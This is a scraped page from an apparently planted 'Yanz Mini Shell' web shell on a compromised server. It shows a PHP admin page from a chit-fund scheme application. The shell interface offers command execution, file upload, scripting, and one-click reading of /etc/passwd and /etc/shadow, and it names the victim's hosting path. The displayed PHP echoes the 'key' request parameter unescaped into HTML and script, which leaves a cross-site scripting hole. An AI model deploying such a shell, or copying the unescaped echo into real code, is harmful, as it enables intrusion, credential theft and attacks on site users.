Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
sparkline
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<head> </head> <section class="content-header" style="background-color: white;"> <div class="row"> <div class="col-md-6" style="text-align: left;"> <h4><?php if(isset($_GET['key']) && $_GET['key']!=''){ echo 'View';}else { echo 'Add';} ?> Scheme Details</h4> </div> <div class="col-md-6" style="text-align: right;"> <a href="updated_chit_taken_info1.php?key=<?php echo$_GET['key'] ?>" class="btn btn-success btn-sm"><i class="fa fa-plus"></i> Bidding</a> <a href="chit_schemes.php" class="btn btn-info btn-sm"><i class="fa fa-list"></i> Back to Scheme List</a> </div> </div> </section> <?php if(isset($_GET['key']) && $_GET['key']!=''){ $location_id = id_decrypt($_GET['key']); $statement = $pdo->prepare("SELECT * FROM tbl_scheme where id=?"); $statement->execute(array($location_id)); $partner_result = $statement->fetchAll(PDO::FETCH_ASSOC); $reason = $statement->rowCount(); } else { $reason = 0; } ?> <style> thead{ background: #dbcbcb; } table.table tbody tr:hover td { background: none !important; } .row1 { display: flex; margin-left:10px; margin-bottom:10px; } .column1 { flex: 80%; } .column2 { flex: 7%; } </style> <section class="content"> <div class="row"> <div class="col-xs-12"> <div class="box box-primary" style="box-shadow: rgba(0, 0, 0, 0.16) 0px 3px 6px, rgba(0, 0, 0, 0.23) 0px 3px 6px;"> <div class="box-body"> <div id="content-div"> <div class="row"> <div class="col-md-12" style="padding-top: 5px;"> <table class="table table-striped" style="text-align:left"> <tr> <th>Scheme Name :</th> <td><?php echo $partner_result[0]['scheme_name'];?></td> <th>Scheme Members :</th> <td><?php echo $partner_result[0]['scheme_members'];?></td> <th>Scheme Amount :</th> <td><?php echo $partner_result[0]['scheme_amount'];?></td> </tr> <tr> <th>Amount of Subscription:</th> <td><?php echo $partner_result[0]['scheme_amount']/$partner_result[0]['scheme_members'];;?></td> <th>Commission Percentage :</th> <td><?php echo $partner_result[0]['comission_percentage'];?></td> <th>Per Term Commission Amount:</th> <td><?php echo $partner_result[0]['per_term_comi_amount'];?></td> <!--<th>Commission Amount :</th>--> <!--<td><?php echo $partner_result[0]['comission_amount'];?></td>--> </tr> <tr> <th>Start Date :</th> <td><?php echo $partner_result[0]['start_date'];?></td> <th>Status :</th> <td><?php echo $partner_result[0]['status'];?></td> <th>Intrest Percentage :</th> <td><?php echo $partner_result[0]['intrest_percentage'];?></td> </tr> <tr> </tr> </table> </div> </div> </div> </div> </div> </div> </div> <div class="row" id="filter"> <div class="col-md-3"> </div> </div> <div class="row"> <div class="col-md-12"> <div class="row1"> <div class="column1"> <h4>Associated Customers</h4> </div> <div class="column2"> <button onclick=window.print() class="btn btn-success btn-md"><i class="fa fa-print"></i> Print</button> </div> </div> <table class="table table-bordered" id="customers-table"> <thead> <tr> <th>S.No</th> <th>Customer Details</th> <th>Amount of Discount</th> <th>Date</th> <th>Total Dividend</th> <th>Settlement_amount</th> <th>Sub Share</th> <th>Sub Dividend</th> </tr> </thead> <tbody id="customers-body"> </tbody> </table> </div> </div> </section> <script src="js/jquery-2.2.4.min.js"></script> <!--<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>--> <script src="js/bootstrap.min.js"></script> <script src="js/jquery.dataTables.min.js"></script> <script src="js/dataTables.bootstrap.min.js"></script> <script src="js/select2.full.min.js"></script> <script src="js/jquery.inputmask.js"></script> <script src="js/jquery.inputmask.date.extensions.js"></script> <script src="js/jquery.inputmask.extensions.js"></script> <script src="js/moment.min.js"></script> <script src="js/bootstrap-datepicker.js"></script> <script src="js/icheck.min.js"></script> <script src="js/fastclick.js"></script> <script src="js/jquery.sparkline.min.js"></script> <script src="js/jquery.slimscroll.min.js"></script> <script src="js/jquery.fancybox.pack.js"></script> <script src="js/app.min.js"></script> <script src="js/jscolor.js"></script> <script src="js/on-off-switch.js"></script> <script src="js/on-off-switch-onload.js"></script> <script src="js/clipboard.min.js"></script> <script src="js/demo.js"></script> <script src="js/summernote.js"></script> <link rel="stylesheet" href="css/bootstrap.min.css"> <link rel="stylesheet" href="css/font-awesome.min.css"> <link rel="stylesheet" href="css/ionicons.min.css"> <link rel="stylesheet" href="css/datepicker3.css"> <link rel="stylesheet" href="css/all.css"> <link rel="stylesheet" href="css/select2.min.css"> <link rel="stylesheet" href="css/dataTables.bootstrap.css"> <link rel="stylesheet" href="css/jquery.fancybox.css"> <link rel="stylesheet" href="css/AdminLTE.min.css"> <link rel="stylesheet" href="css/_all-skins.min.css"> <link rel="stylesheet" href="css/on-off-switch.css"/> <link rel="stylesheet" href="css/summernote.css"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/font/bootstrap-icons.min.css"> <script> $(document).ready(function(){ getData(); }); function getData(){ var scheme_id = '<?php echo $location_id ?>'; var dataTable = $('#customers-table').DataTable( { "processing": true, "serverSide": true, "destroy":true, "ajax":{ url : "data-tables/view_scheme.php", type: "post", data: {scheme_id:scheme_id}, error: function(){ $(".employee-grid-error").html(""); $("#customers-table").append('<tbody class="employee-grid-error"><tr><th colspan="10" style="text-align;center;">No data found in the server</th></tr></tbody>'); $("#customers-table_processing").css("display","none"); } } } ); } </script> <script> $(document).ready(function(){ /* $('#filter').hide();*/ $('.filter').click(function(){ $("#filter").slideToggle(); return false; }); }); </script>
Free Space : 11565121536 Byte